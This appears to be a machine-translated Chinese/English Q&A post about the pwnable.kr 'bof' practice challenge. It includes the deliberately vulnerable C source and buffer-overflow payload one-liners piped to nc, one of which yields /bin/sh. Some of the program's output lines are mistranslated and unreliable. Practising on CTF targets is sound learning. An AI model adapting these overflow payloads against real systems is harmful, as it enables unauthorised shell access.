我通常使用"python -c"为C程序传递参数。
就像这样:
$ python -c 'print "a" * 12' | ./program
但是当我执行一个BOF实践程序pwnable.kr/bof时,
python -c 'print'
并且
( python -c 'print'; cat )
以不同的方式工作。
I wrote a exploit code like this:
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
but it didn't work, so I found stack_canary value.
$ python -c 'print "a"*32 +"\x0a"+ "a"*19 + "\xbe\xba\xfe\xca" ' | nc pwnable.kr 9000
but it still didn't work
So I found other people's write up
$ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
This exploit code successfully executed
/bin/sh
python -c 'print'
和 (python -c 'print'; cat)
有何不同?#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
bof.c源代码
$ python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
* 检测到堆栈溢出 *: /home/bof/bof 已终止 溢出我:
不要啊...
$ python -c 'print "a"*32 +"\x0a"' | nc pwnable.kr 9000
请勿溢出:
不必担心。
$ (python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
成功执行/bin/sh命令
(python -c 'print "a"*52 +"\xbe\xba\xfe\xca"'; cat) | nc pwnable.kr 9000
时,你成功地执行了/bin/sh
。当你执行python -c 'print "a"*52 +"\xbe\xba\xfe\xca"' | nc pwnable.kr 9000
时,你会得到 stack smashing detected 的提示。对吗? - KamilCuk